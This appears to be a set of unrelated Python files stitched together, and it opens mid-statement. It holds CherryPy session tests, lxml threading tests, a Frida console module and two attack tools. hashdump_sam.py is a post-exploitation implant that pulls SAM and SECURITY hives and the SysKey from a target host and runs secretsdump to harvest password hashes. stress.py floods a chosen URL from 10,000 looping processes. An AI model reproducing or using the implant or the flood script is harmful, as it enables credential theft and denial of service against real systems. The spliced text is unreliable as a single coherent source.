'session_id=maliciousid; '
'expires=Sat, 27 Oct 2017 04:18:28 GMT; Path=/;')])
id2 = self.cookies[0][1].split(";", 1)[0].split("=", 1)[1]
self.assertNotEqual(id1, id2)
self.assertNotEqual(id2, 'maliciousid')
def test_7_session_cookies(self):
self.getPage('/setsessiontype/ram')
self.getPage('/clear')
self.getPage('/session_cookie')
# grab the cookie ID
cookie_parts = dict([p.strip().split('=') for p in self.cookies[0][1].split(";")])
# Assert there is no 'expires' param
self.assertEqual(set(cookie_parts.keys()), set(['temp', 'Path']))
id1 = cookie_parts['temp']
self.assertEqual(copykeys(sessions.RamSession.cache), [id1])
# Send another request in the same "browser session".
self.getPage('/session_cookie', self.cookies)
cookie_parts = dict([p.strip().split('=') for p in self.cookies[0][1].split(";")])
# Assert there is no 'expires' param
self.assertEqual(set(cookie_parts.keys()), set(['temp', 'Path']))
self.assertBody(id1)
self.assertEqual(copykeys(sessions.RamSession.cache), [id1])
# Simulate a browser close by just not sending the cookies
self.getPage('/session_cookie')
# grab the cookie ID
cookie_parts = dict([p.strip().split('=') for p in self.cookies[0][1].split(";")])
# Assert there is no 'expires' param
self.assertEqual(set(cookie_parts.keys()), set(['temp', 'Path']))
# Assert a new id has been generated...
id2 = cookie_parts['temp']
self.assertNotEqual(id1, id2)
self.assertEqual(set(sessions.RamSession.cache.keys()), set([id1, id2]))
# Wait for the session.timeout on both sessions
time.sleep(2.5)
cache = copykeys(sessions.RamSession.cache)
if cache:
if cache == [id2]:
self.fail("The second session did not time out.")
else:
self.fail("Unknown session id in cache: %r", cache)
import socket
try:
import memcache
host, port = '127.0.0.1', 11211
for res in socket.getaddrinfo(host, port, socket.AF_UNSPEC,
socket.SOCK_STREAM):
af, socktype, proto, canonname, sa = res
s = None
try:
s = socket.socket(af, socktype, proto)
# See http://groups.google.com/group/cherrypy-users/
# browse_frm/thread/bbfe5eb39c904fe0
s.settimeout(1.0)
s.connect((host, port))
s.close()
except socket.error:
if s:
s.close()
raise
break
except (ImportError, socket.error):
class MemcachedSessionTest(helper.CPWebCase):
setup_server = staticmethod(setup_server)
def test(self):
return self.skip("memcached not reachable ")
else:
class MemcachedSessionTest(helper.CPWebCase):
setup_server = staticmethod(setup_server)
def test_0_Session(self):
self.getPage('/setsessiontype/memcached')
self.getPage('/testStr')
self.assertBody('1')
self.getPage('/testGen', self.cookies)
self.assertBody('2')
self.getPage('/testStr', self.cookies)
self.assertBody('3')
self.getPage('/length', self.cookies)
self.assertErrorPage(500)
self.assertInBody("NotImplementedError")
self.getPage('/delkey?key=counter', self.cookies)
self.assertStatus(200)
# Wait for the session.timeout (1 second)
time.sleep(1.25)
self.getPage('/')
self.assertBody('1')
# Test session __contains__
self.getPage('/keyin?key=counter', self.cookies)
self.assertBody("True")
# Test session delete
self.getPage('/delete', self.cookies)
self.assertBody("done")
def test_1_Concurrency(self):
client_thread_count = 5
request_count = 30
# Get initial cookie
self.getPage("/")
self.assertBody("1")
cookies = self.cookies
data_dict = {}
def request(index):
for i in range(request_count):
self.getPage("/", cookies)
# Uncomment the following line to prove threads overlap.
## sys.stdout.write("%d " % index)
if not self.body.isdigit():
self.fail(self.body)
data_dict[index] = v = int(self.body)
# Start <request_count> concurrent requests from
# each of <client_thread_count> clients
ts = []
for c in range(client_thread_count):
data_dict[c] = 0
t = threading.Thread(target=request, args=(c,))
ts.append(t)
t.start()
for t in ts:
t.join()
hitcount = max(data_dict.values())
expected = 1 + (client_thread_count * request_count)
self.assertEqual(hitcount, expected)
def test_3_Redirect(self):
# Start a new session
self.getPage('/testStr')
self.getPage('/iredir', self.cookies)
self.assertBody("memcached")
def test_5_Error_paths(self):
self.getPage('/unknown/page')
self.assertErrorPage(404, "The path '/unknown/page' was not found.")
# Note: this path is *not* the same as above. The above
# takes a normal route through the session code; this one
# skips the session code's before_handler and only calls
# before_finalize (save) and on_end (close). So the session
# code has to survive calling save/close without init.
self.getPage('/restricted', self.cookies, method='POST')
self.assertErrorPage(405, response_codes[405][1])
|
hashdump_sam.py
|
import core.implant
class HashDumpSAMImplant(core.implant.Implant):
NAME = "SAM Hash Dump"
DESCRIPTION = "Dumps the SAM hive off the target system."
AUTHORS = ["zerosum0x0"]
def load(self):
self.options.register("LPATH", "/tmp/", "local file save path")
self.options.register("RPATH", "%TEMP%", "remote file save path")
def run(self):
payloads = {}
payloads["js"] = self.loader.load_script("data/implant/gather/hashdump_sam.js", self.options)
self.dispatch(payloads, HashDumpSAMJob)
class HashDumpSAMJob(core.job.Job):
def save_file(self, data):
import uuid
save_fname = self.options.get("LPATH") + "/" + uuid.uuid4().hex
save_fname = save_fname.replace("//", "/")
with open(save_fname, "wb") as f:
data = self.decode_downloaded_data(data)
f.write(data)
return save_fname
def report(self, handler, data, sanitize = False):
task = handler.get_header("Task", False)
if task == "SAM":
handler.reply(200)
self.print_status("received SAM hive (%d bytes)" % len(data))
self.sam_data = data
return
# if task == "SYSTEM":
# handler.reply(200)
# self.print_status("received SYSTEM hive (%d bytes)" % len(data))
# self.system_data = data
# return
if task == "SysKey":
handler.reply(200)
self.print_status("received SysKey (%d bytes)" % len(data))
self.syskey_data = data
return
if task == "SECURITY":
handler.reply(200)
self.print_status("received SECURITY hive (%d bytes)" % len(data))
self.security_data = data
return
# dump sam here
import threading
self.finished = False
threading.Thread(target=self.finish_up).start()
handler.reply(200)
def finish_up(self):
from subprocess import Popen, PIPE, STDOUT
# p = Popen(["which", "secretsdump.py"], stdout=PIPE)
# path = p.communicate()[0].strip()
# path = path.decode() if type(path) is bytes else path
# if not path:
# print("Error decoding: secretsdump.py not in PATH!")
# return
path = "data/bin/secretsdump/secretsdump.py"
self.sam_file = self.save_file(self.sam_data)
self.print_status("decoded SAM hive (%s)" % self.sam_file)
self.security_file = self.save_file(self.security_data)
self.print_status("decoded SECURITY hive (%s)" % self.security_file)
# self.system_file = self.save_file(self.system_data)
# self.print_status("decoded SYSTEM hive (%s)" % self.system_file)
self.syskey_data_file = self.save_file(self.syskey_data)
tmp_syskey = ""
self.syskey = ""
with open(self.syskey_data_file, 'rb') as syskeyfile:
file_contents = syskeyfile.read()
i = 4220
while i < 28811:
j = i + 15
while i < j:
tmp_syskey += file_contents[i:i+1].decode()
i += 2
i += 8176
tmp_syskey = list(map(''.join, zip(*[iter(tmp_syskey)]*2)))
transforms = [8, 5, 4, 2, 11, 9, 13, 3, 0, 6, 1, 12, 14, 10, 15, 7]
for i in transforms:
self.syskey += tmp_syskey[i]
self.print_status("decoded SysKey: 0x%s" % self.syskey)
# cmd = ['python2', path, '-sam', self.sam_file, '-system', self.system_file, '-security', self.security_file, 'LOCAL']
cmd = ['python2', path, '-sam', self.sam_file, '-bootkey', self.syskey, '-security', self.security_file, 'LOCAL']
p = Popen(cmd, stdin=PIPE, stdout=PIPE, stderr=STDOUT, close_fds=True)
output = p.stdout.read().decode()
self.shell.print_plain(output)
cp = core.cred_parser.CredParse(self)
cp.parse_hashdump_sam(output)
super(HashDumpSAMJob, self).report(None, "", False)
def done(self):
#self.display()
pass
def display(self):
pass
|
test_threading.py
|
# -*- coding: utf-8 -*-
"""
Tests for thread usage in lxml.etree.
"""
import unittest, threading, sys, os.path
this_dir = os.path.dirname(__file__)
if this_dir not in sys.path:
sys.path.insert(0, this_dir) # needed for Py3
from common_imports import etree, HelperTestCase, BytesIO, _bytes
try:
from Queue import Queue
except ImportError:
from queue import Queue # Py3
class ThreadingTestCase(HelperTestCase):
"""Threading tests"""
etree = etree
def _run_thread(self, func):
thread = threading.Thread(target=func)
thread.start()
thread.join()
def test_subtree_copy_thread(self):
tostring = self.etree.tostring
XML = self.etree.XML
xml = _bytes("<root><threadtag/></root>")
main_root = XML(_bytes("<root/>"))
def run_thread():
thread_root = XML(xml)
main_root.append(thread_root[0])
del thread_root
self._run_thread(run_thread)
self.assertEqual(xml, tostring(main_root))
def test_main_xslt_in_thread(self):
XML = self.etree.XML
style = XML(_bytes('''\
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="*">
<foo><xsl:copy><xsl:value-of select="/a/b/text()" /></xsl:copy></foo>
</xsl:template>
</xsl:stylesheet>'''))
st = etree.XSLT(style)
result = []
def run_thread():
root = XML(_bytes('<a><b>B</b><c>C</c></a>'))
result.append( st(root) )
self._run_thread(run_thread)
self.assertEqual('''\
<?xml version="1.0"?>
<foo><a>B</a></foo>
''',
str(result[0]))
def test_thread_xslt(self):
XML = self.etree.XML
tostring = self.etree.tostring
root = XML(_bytes('<a><b>B</b><c>C</c></a>'))
def run_thread():
style = XML(_bytes('''\
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="*">
<foo><xsl:copy><xsl:value-of select="/a/b/text()" /></xsl:copy></foo>
</xsl:template>
</xsl:stylesheet>'''))
st = etree.XSLT(style)
root.append( st(root).getroot() )
self._run_thread(run_thread)
self.assertEqual(_bytes('<a><b>B</b><c>C</c><foo><a>B</a></foo></a>'),
tostring(root))
def test_thread_xslt_attr_replace(self):
# this is the only case in XSLT where the result tree can be
# modified in-place
XML = self.etree.XML
tostring = self.etree.tostring
style = self.etree.XSLT(XML(_bytes('''\
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="*">
<root class="abc">
<xsl:copy-of select="@class" />
<xsl:attribute name="class">xyz</xsl:attribute>
</root>
</xsl:template>
</xsl:stylesheet>''')))
result = []
def run_thread():
root = XML(_bytes('<ROOT class="ABC" />'))
result.append( style(root).getroot() )
self._run_thread(run_thread)
self.assertEqual(_bytes('<root class="xyz"/>'),
tostring(result[0]))
def test_thread_create_xslt(self):
XML = self.etree.XML
tostring = self.etree.tostring
root = XML(_bytes('<a><b>B</b><c>C</c></a>'))
stylesheets = []
def run_thread():
style = XML(_bytes('''\
<xsl:stylesheet
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
version="1.0">
<xsl:output method="xml" />
<xsl:template match="/">
<div id="test">
<xsl:apply-templates/>
</div>
</xsl:template>
</xsl:stylesheet>'''))
stylesheets.append( etree.XSLT(style) )
self._run_thread(run_thread)
st = stylesheets[0]
result = tostring( st(root) )
self.assertEqual(_bytes('<div id="test">BC</div>'),
result)
def test_thread_error_log(self):
XML = self.etree.XML
ParseError = self.etree.ParseError
expected_error = [self.etree.ErrorTypes.ERR_TAG_NAME_MISMATCH]
children = "<a>test</a>" * 100
def parse_error_test(thread_no):
tag = "tag%d" % thread_no
xml = "<%s>%s</%s>" % (tag, children, tag.upper())
parser = self.etree.XMLParser()
for _ in range(10):
errors = None
try:
XML(xml, parser)
except self.etree.ParseError:
e = sys.exc_info()[1]
errors = e.error_log.filter_types(expected_error)
self.assertTrue(errors, "Expected error not found")
for error in errors:
self.assertTrue(
tag in error.message and tag.upper() in error.message,
"%s and %s not found in '%s'" % (
tag, tag.upper(), error.message))
self.etree.clear_error_log()
threads = []
for thread_no in range(1, 10):
t = threading.Thread(target=parse_error_test,
args=(thread_no,))
threads.append(t)
t.start()
parse_error_test(0)
for t in threads:
t.join()
def test_thread_mix(self):
XML = self.etree.XML
Element = self.etree.Element
SubElement = self.etree.SubElement
tostring = self.etree.tostring
xml = _bytes('<a><b>B</b><c xmlns="test">C</c></a>')
root = XML(xml)
fragment = XML(_bytes("<other><tags/></other>"))
result = self.etree.Element("{myns}root", att = "someval")
def run_XML():
thread_root = XML(xml)
result.append(thread_root[0])
result.append(thread_root[-1])
def run_parse():
thread_root = self.etree.parse(BytesIO(xml)).getroot()
result.append(thread_root[0])
result.append(thread_root[-1])
def run_move_main():
result.append(fragment[0])
def run_build():
result.append(
Element("{myns}foo", attrib={'{test}attr':'val'}))
SubElement(result, "{otherns}tasty")
def run_xslt():
style = XML(_bytes('''\
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="*">
<xsl:copy><foo><xsl:value-of select="/a/b/text()" /></foo></xsl:copy>
</xsl:template>
</xsl:stylesheet>'''))
st = etree.XSLT(style)
result.append( st(root).getroot() )
for test in (run_XML, run_parse, run_move_main, run_xslt, run_build):
tostring(result)
self._run_thread(test)
self.assertEqual(
_bytes('<ns0:root xmlns:ns0="myns" att="someval"><b>B</b>'
'<c xmlns="test">C</c><b>B</b><c xmlns="test">C</c><tags/>'
'<a><foo>B</foo></a>'
'<ns0:foo xmlns:ns1="test" ns1:attr="val"/>'
'<ns1:tasty xmlns:ns1="otherns"/></ns0:root>'),
tostring(result))
def strip_first():
root = Element("newroot")
root.append(result[0])
while len(result):
self._run_thread(strip_first)
self.assertEqual(
_bytes('<ns0:root xmlns:ns0="myns" att="someval"/>'),
tostring(result))
def test_concurrent_proxies(self):
XML = self.etree.XML
root = XML(_bytes('<root><a>A</a><b xmlns="test">B</b><c/></root>'))
child_count = len(root)
def testrun():
for i in range(10000):
el = root[i%child_count]
del el
threads = [ threading.Thread(target=testrun)
for _ in range(10) ]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
def test_concurrent_class_lookup(self):
XML = self.etree.XML
class TestElement(etree.ElementBase):
pass
class MyLookup(etree.CustomElementClassLookup):
repeat = range(100)
def lookup(self, t, d, ns, name):
count = 0
for i in self.repeat:
# allow other threads to run
count += 1
return TestElement
parser = self.etree.XMLParser()
parser.set_element_class_lookup(MyLookup())
root = XML(_bytes('<root><a>A</a><b xmlns="test">B</b><c/></root>'),
parser)
child_count = len(root)
def testrun():
for i in range(1000):
el = root[i%child_count]
del el
threads = [ threading.Thread(target=testrun)
for _ in range(10) ]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
class ThreadPipelineTestCase(HelperTestCase):
"""Threading tests based on a thread worker pipeline.
"""
etree = etree
item_count = 20
class Worker(threading.Thread):
def __init__(self, in_queue, in_count, **kwargs):
threading.Thread.__init__(self)
self.in_queue = in_queue
self.in_count = in_count
self.out_queue = Queue(in_count)
self.__dict__.update(kwargs)
def run(self):
get, put = self.in_queue.get, self.out_queue.put
handle = self.handle
for _ in range(self.in_count):
put(handle(get()))
class ParseWorker(Worker):
etree = etree
def handle(self, xml):
return self.etree.XML(xml)
class RotateWorker(Worker):
def handle(self, element):
first = element[0]
element[:] = element[1:]
element.append(first)
return element
class ReverseWorker(Worker):
def handle(self, element):
element[:] = element[::-1]
return element
class ParseAndExtendWorker(Worker):
etree = etree
def handle(self, element):
element.extend(self.etree.XML(self.xml))
return element
class SerialiseWorker(Worker):
def handle(self, element):
return etree.tostring(element)
xml = _bytes('''\
<xsl:stylesheet
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
version="1.0">
<xsl:output method="xml" />
<xsl:template match="/">
<div id="test">
<xsl:apply-templates/>
</div>
</xsl:template>
</xsl:stylesheet>''')
def _build_pipeline(self, item_count, *classes, **kwargs):
in_queue = Queue(item_count)
start = last = classes[0](in_queue, item_count, **kwargs)
start.setDaemon(True)
for worker_class in classes[1:]:
last = worker_class(last.out_queue, item_count, **kwargs)
last.setDaemon(True)
last.start()
return (in_queue, start, last)
def test_thread_pipeline_thread_parse(self):
item_count = self.item_count
# build and start the pipeline
in_queue, start, last = self._build_pipeline(
item_count,
self.ParseWorker,
self.RotateWorker,
self.ReverseWorker,
self.ParseAndExtendWorker,
self.SerialiseWorker,
xml = self.xml)
# fill the queue
put = start.in_queue.put
for _ in range(item_count):
put(self.xml)
# start the first thread and thus everything
start.start()
# make sure the last thread has terminated
last.join(60) # time out after 60 seconds
self.assertEqual(item_count, last.out_queue.qsize())
# read the results
get = last.out_queue.get
results = [ get() for _ in range(item_count) ]
comparison = results[0]
for i, result in enumerate(results[1:]):
self.assertEqual(comparison, result)
def test_thread_pipeline_global_parse(self):
item_count = self.item_count
XML = self.etree.XML
# build and start the pipeline
in_queue, start, last = self._build_pipeline(
item_count,
self.RotateWorker,
self.ReverseWorker,
self.ParseAndExtendWorker,
self.SerialiseWorker,
xml = self.xml)
# fill the queue
put = start.in_queue.put
for _ in range(item_count):
put(XML(self.xml))
# start the first thread and thus everything
start.start()
# make sure the last thread has terminated
last.join(60) # time out after 90 seconds
self.assertEqual(item_count, last.out_queue.qsize())
# read the results
get = last.out_queue.get
results = [ get() for _ in range(item_count) ]
comparison = results[0]
for i, result in enumerate(results[1:]):
self.assertEqual(comparison, result)
def test_suite():
suite = unittest.TestSuite()
suite.addTests([unittest.makeSuite(ThreadingTestCase)])
suite.addTests([unittest.makeSuite(ThreadPipelineTestCase)])
return suite
if __name__ == '__main__':
print('to test use test.py %s' % __file__)
|
stress.py
|
#!/usr/bin/python3
"""
A web stressor to test your infrastructure
"""
from multiprocessing import Process
import requests
# send a request
def send_request(url):
while True:
requests.get(url)
if __name__ == "__main__":
conn_pool = []
url = input("what url do you want to send to: ")
for i in range(10000):
print(i)
Process(target=send_request, args=(url,)).start()
|
application.py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals, print_function
import codecs
import collections
import errno
import numbers
from optparse import OptionParser
import os
import platform
import re
import select
import shlex
import signal
import sys
import threading
import time
if platform.system() == 'Windows':
import msvcrt
import colorama
from colorama import Cursor, Fore, Style
import frida
AUX_OPTION_PATTERN = re.compile(r"(.+)=\((string|bool|int)\)(.+)")
def input_with_cancellable(cancellable):
if platform.system() == 'Windows':
result = ""
done = False
while not done:
while msvcrt.kbhit():
c = msvcrt.getwche()
if c in ("\x00", "\xe0"):
msvcrt.getwche()
continue
result += c
if c == "\n":
done = True
break
cancellable.raise_if_cancelled()
time.sleep(0.05)
return result
else:
with cancellable.get_pollfd() as cancellable_fd:
try:
rlist, _, _ = select.select([sys.stdin, cancellable_fd], [], [])
except (OSError, select.error) as e:
if e.args[0] != errno.EINTR:
raise e
cancellable.raise_if_cancelled()
return sys.stdin.readline()
def await_enter(reactor):
try:
input_with_cancellable(reactor.ui_cancellable)
except frida.OperationCancelledError:
pass
except KeyboardInterrupt:
print("")
class ConsoleState:
EMPTY = 1
STATUS = 2
TEXT = 3
class ConsoleApplication(object):
def __init__(self, run_until_return=await_enter, on_stop=None):
plain_terminal = os.environ.get("TERM", "").lower() == "none"
colorama.init(strip=True if plain_terminal else None)
parser = OptionParser(usage=self._usage(), version=frida.__version__)
if self._needs_device():
parser.add_option("-D", "--device", help="connect to device with the given ID",
metavar="ID", type='string', action='store', dest="device_id", default=None)
parser.add_option("-U", "--usb", help="connect to USB device",
action='store_const', const='usb', dest="device_type", default=None)
parser.add_option("-R", "--remote", help="connect to remote frida-server",
action='store_const', const='remote', dest="device_type", default=None)
parser.add_option("-H", "--host", help="connect to remote frida-server on HOST",
metavar="HOST", type='string', action='store', dest="host", default=None)
if self._needs_target():
def store_target(option, opt_str, target_value, parser, target_type, *args, **kwargs):
if target_type == 'file':
target_value = [target_value]
setattr(parser.values, 'target', (target_type, target_value))
parser.add_option("-f", "--file", help="spawn FILE", metavar="FILE",
type='string', action='callback', callback=store_target, callback_args=('file',))
parser.add_option("-F", "--attach-frontmost", help="attach to frontmost application",
action='callback', callback=store_target, callback_args=('frontmost',))
parser.add_option("-n", "--attach-name", help="attach to NAME", metavar="NAME",
type='string', action='callback', callback=store_target, callback_args=('name',))
parser.add_option("-p", "--attach-pid", help="attach to PID", metavar="PID",
type='int', action='callback', callback=store_target, callback_args=('pid',))
parser.add_option("--stdio", help="stdio behavior when spawning (defaults to “inherit”)", metavar="inherit|pipe",
type='choice', choices=['inherit', 'pipe'], default='inherit')
parser.add_option("--aux", help="set aux option when spawning, such as “uid=(int)42” (supported types are: string, bool, int)", metavar="option",
type='string', action='append', dest="aux", default=[])
parser.add_option("--runtime", help="script runtime to use", metavar="duk|v8",
type='choice', choices=['duk', 'v8'], default=None)
parser.add_option("--debug", help="enable the Node.js compatible script debugger",
action='store_true', dest="enable_debugger", default=False)
parser.add_option("--squelch-crash", help="if enabled, will not dump crash report to console",
action='store_true', dest="squelch_crash", default=False)
parser.add_option("-O", "--options-file", help="text file containing additional command line options",
metavar="FILE", type='string', action='store')
self._add_options(parser)
real_args = compute_real_args(parser)
(options, args) = parser.parse_args(real_args)
if sys.version_info[0] < 3:
input_encoding = sys.stdin.encoding or 'UTF-8'
args = [arg.decode(input_encoding) for arg in args]
if self._needs_device():
self._device_id = options.device_id
self._device_type = options.device_type
self._host = options.host
else:
self._device_id = None
self._device_type = None
self._host = None
self._device = None
self._schedule_on_output = lambda pid, fd, data: self._reactor.schedule(lambda: self._on_output(pid, fd, data))
self._schedule_on_device_lost = lambda: self._reactor.schedule(self._on_device_lost)
self._spawned_pid = None
self._spawned_argv = None
self._target_pid = None
self._session = None
if self._needs_target():
self._stdio = options.stdio
self._aux = options.aux
self._runtime = options.runtime
self._enable_debugger = options.enable_debugger
self._squelch_crash = options.squelch_crash
else:
self._stdio = 'inherit'
self._aux = []
self._runtime = 'duk'
self._enable_debugger = False
self._squelch_crash = False
self._schedule_on_session_detached = lambda reason, crash: self._reactor.schedule(lambda: self._on_session_detached(reason, crash))
self._started = False
self._resumed = False
self._reactor = Reactor(run_until_return, on_stop)
self._exit_status = None
self._console_state = ConsoleState.EMPTY
self._have_terminal = sys.stdin.isatty() and sys.stdout.isatty() and not os.environ.get("TERM", '') == "dumb"
self._plain_terminal = plain_terminal
self._quiet = False
if sum(map(lambda v: int(v is not None), (self._device_id, self._device_type, self._host))) > 1:
parser.error("Only one of -D, -U, -R, and -H may be specified")
if self._needs_target():
target = getattr(options, 'target', None)
if target is None:
if len(args) < 1:
parser.error("target file, process name or pid must be specified")
target = infer_target(args[0])
args.pop(0)
target = expand_target(target)
if target[0] == 'file':
argv = target[1]
argv.extend(args)
args = []
self._target = target
else:
self._target = None
try:
self._initialize(parser, options, args)
except Exception as e:
parser.error(str(e))
def run(self):
mgr = frida.get_device_manager()
on_devices_changed = lambda: self._reactor.schedule(self._try_start)
mgr.on('changed', on_devices_changed)
self._reactor.schedule(self._try_start)
self._reactor.schedule(self._show_message_if_no_device, delay=1)
signal.signal(signal.SIGTERM, self._on_sigterm)
self._reactor.run()
if self._started:
try:
self._perform_on_background_thread(self._stop)
except frida.OperationCancelledError:
pass
if self._session is not None:
self._session.off('detached', self._schedule_on_session_detached)
try:
self._perform_on_background_thread(self._session.detach)
except frida.OperationCancelledError:
pass
self._session = None
if self._device is not None:
self._device.off('output', self._schedule_on_output)
self._device.off('lost', self._schedule_on_device_lost)
mgr.off('changed', on_devices_changed)
frida.shutdown()
sys.exit(self._exit_status)
def _add_options(self, parser):
pass
def _initialize(self, parser, options, args):
pass
def _needs_device(self):
return True
def _needs_target(self):
return False
def _start(self):
pass
def _stop(self):
pass
def _resume(self):
if self._resumed:
return
if self._spawned_pid is not None:
self._device.resume(self._spawned_pid)
self._resumed = True
def _exit(self, exit_status):
self._exit_status = exit_status
self._reactor.stop()
def _try_start(self):
if self._device is not None:
return
if self._device_id is not None:
try:
self._device = frida.get_device(self._device_id)
except:
self._update_status("Device '%s' not found" % self._device_id)
self._exit(1)
return
elif self._device_type is not None:
self._device = find_device(self._device_type)
if self._device is None:
return
elif self._host is not None:
self._device = frida.get_device_manager().add_remote_device(self._host)
else:
self._device = frida.get_local_device()
self._device.on('output', self._schedule_on_output)
self._device.on('lost', self._schedule_on_device_lost)
if self._target is not None:
spawning = True
try:
target_type, target_value = self._target
if target_type == 'frontmost':
try:
app = self._device.get_frontmost_application()
except Exception as e:
self._update_status("Unable to get frontmost application on {}: {}".format(self._device.name, e))
self._exit(1)
return
if app is None:
self._update_status("No frontmost application on {}".format(self._device.name))
self._exit(1)
return
self._target = ('name', app.name)
attach_target = app.pid
elif target_type == 'file':
argv = target_value
if not self._quiet:
self._update_status("Spawning `%s`..." % " ".join(argv))
aux_kwargs = {}
if self._aux is not None:
aux_kwargs = dict([parse_aux_option(o) for o in self._aux])
self._spawned_pid = self._device.spawn(argv, stdio=self._stdio, **aux_kwargs)
self._spawned_argv = argv
attach_target = self._spawned_pid
else:
attach_target = target_value
if not isinstance(attach_target, numbers.Number):
attach_target = self._device.get_process(attach_target).pid
if not self._quiet:
self._update_status("Attaching...")
spawning = False
self._target_pid = attach_target
self._session = self._device.attach(attach_target)
if self._enable_debugger:
self._session.enable_debugger()
self._print("Chrome Inspector server listening on port 9229\n")
self._session.on('detached', self._schedule_on_session_detached)
except frida.OperationCancelledError:
self._exit(0)
return
except Exception as e:
if spawning:
self._update_status("Failed to spawn: %s" % e)
else:
self._update_status("Failed to attach: %s" % e)
self._exit(1)
return
self._start()
self._started = True
def _show_message_if_no_device(self):
if self._device is None:
self._print("Waiting for USB device to appear...")
def _on_sigterm(self, n, f):
self._reactor.cancel_io()
self._exit(0)
def _on_output(self, pid, fd, data):
if pid != self._target_pid or data is None:
return
if fd == 1:
prefix = "stdout> "
stream = sys.stdout
else:
prefix = "stderr> "
stream = sys.stderr
encoding = stream.encoding or 'UTF-8'
text = data.decode(encoding, errors='replace')
if text.endswith("\n"):
text = text[:-1]
lines = text.split("\n")
self._print(prefix + ("\n" + prefix).join(lines))
def _on_device_lost(self):
if self._exit_status is not None:
return
self._print("Device disconnected.")
self._exit(1)
def _on_session_detached(self, reason, crash):
if crash is None:
message = reason[0].upper() + reason[1:].replace("-", " ")
else:
message = "Process crashed: " + crash.summary
self._print(Fore.RED + Style.BRIGHT + message + Style.RESET_ALL)
if crash is not None:
if self._squelch_crash is True:
self._print("\n*** Crash report was squelched due to user setting. ***")
else:
self._print("\n***\n{}\n***".format(crash.report.rstrip("\n")))
self._exit(1)
def _clear_status(self):
if self._console_state == ConsoleState.STATUS:
print(Cursor.UP() + (80 * " "))
def _update_status(self, message):
if self._have_terminal:
if self._console_state == ConsoleState.STATUS:
cursor_position = Cursor.UP()
else:
cursor_position = ""
print("%-80s" % (cursor_position + Style.BRIGHT + message + Style.RESET_ALL,))
self._console_state = ConsoleState.STATUS
else:
print(Style.BRIGHT + message + Style.RESET_ALL)
def _print(self, *args, **kwargs):
encoded_args = []
encoding = sys.stdout.encoding or 'UTF-8'
if encoding == 'UTF-8':
encoded_args = args
else:
if sys.version_info[0] >= 3:
string_type = str
else:
string_type = unicode
for arg in args:
if isinstance(arg, string_type):
encoded_args.append(arg.encode(encoding, errors='backslashreplace').decode(encoding))
else:
encoded_args.append(arg)
print(*encoded_args, **kwargs)
self._console_state = ConsoleState.TEXT
def _log(self, level, text):
if level == 'info':
self._print(text)
else:
color = Fore.RED if level == 'error' else Fore.YELLOW
text = color + Style.BRIGHT + text + Style.RESET_ALL
if level == 'error':
self._print(text, file=sys.stderr)
else:
self._print(text)
def _perform_on_reactor_thread(self, f):
completed = threading.Event()
result = [None, None]
def work():
try:
result[0] = f()
except Exception as e:
result[1] = e
completed.set()
self._reactor.schedule(work)
while not completed.is_set():
try:
completed.wait()
except KeyboardInterrupt:
self._reactor.cancel_io()
continue
error = result[1]
if error is not None:
raise error
return result[0]
def _perform_on_background_thread(self, f, timeout=None):
result = [None, None]
def work():
with self._reactor.io_cancellable:
try:
result[0] = f()
except Exception as e:
result[1] = e
worker = threading.Thread(target=work)
worker.start()
try:
worker.join(timeout)
except KeyboardInterrupt:
self._reactor.cancel_io()
if timeout is not None and worker.is_alive():
self._reactor.cancel_io()
while worker.is_alive():
try:
worker.join()
except KeyboardInterrupt:
pass
error = result[1]
if error is not None:
raise error
return result[0]
def compute_real_args(parser):
real_args = normalize_options_file_args(sys.argv[1:])
files_processed = set()
while True:
offset = find_options_file_offset(real_args, parser)
if offset == -1:
break
file_path = os.path.abspath(real_args[offset + 1])
if file_path in files_processed:
parser.error("File '{}' given twice as -O argument".format(file_path))
if os.path.isfile(file_path):
with codecs.open(file_path, 'r', 'utf-8') as f:
new_arg_text = f.read()
else:
parser.error("File '{}' following -O option is not a valid file".format(file_path))
real_args = insert_options_file_args_in_list(real_args, offset, new_arg_text)
files_processed.add(file_path)
return real_args
def normalize_options_file_args(raw_args):
result = []
for arg in raw_args:
if arg.startswith("--options-file="):
result.append(arg[0:14])
result.append(arg[15:])
else:
result.append(arg)
return result
def find_options_file_offset(arglist, parser):
for i, arg in enumerate(arglist):
if arg in ("-O", "--options-file"):
if i < len(arglist) - 1:
return i
else:
parser.error("No argument given for -O option")
return -1
def insert_options_file_args_in_list(args, offset, new_arg_text):
new_args = shlex.split(new_arg_text)
new_args = normalize_options_file_args(new_args)
new_args_list = args[:offset] + new_args + args[offset + 2:]
return new_args_list
def find_device(type):
for device in frida.enumerate_devices():
if device.type == type:
return device
return None
def infer_target(target_value):
if target_value.startswith('.') or target_value.startswith(os.path.sep) \
or (platform.system() == 'Windows' \
and target_value[0].isalpha() \
and target_value[1] == ":" \
and target_value[2] == "\\"):
target_type = 'file'
target_value = [target_value]
else:
try:
target_value = int(target_value)
target_type = 'pid'
except:
target_type = 'name'
return (target_type, target_value)
def expand_target(target):
target_type, target_value = target
if target_type == 'file':
target_value = [target_value[0]]
return (target_type, target_value)
def parse_aux_option(option):
m = AUX_OPTION_PATTERN.match(option)
if m is None:
raise ValueError("expected name=(type)value, e.g. “uid=(int)42”; supported types are: string, bool, int")
name = m.group(1)
type_decl = m.group(2)
raw_value = m.group(3)
if type_decl == 'string':
value = raw_value
elif type_decl == 'bool':
value = bool(raw_value)
else:
value = int(raw_value)
return (name, value)
class Reactor(object):
def __init__(self, run_until_return, on_stop=None):
self._running = False
self._run_until_return = run_until_return
self._on_stop = on_stop
self._pending = collections.deque([])
self._lock = threading.Lock()
self._cond = threading.Condition(self._lock)
self.io_cancellable = frida.Cancellable()
self.ui_cancellable = frida.Cancellable()
self._ui_cancellable_fd = self.ui_cancellable.get_pollfd()
def __del__(self):
self._ui_cancellable_fd.release()
def is_running(self):
with self._lock:
return self._running
def run(self):
with self._lock:
self._running = True
worker = threading.Thread(target=self._run)
worker.start()
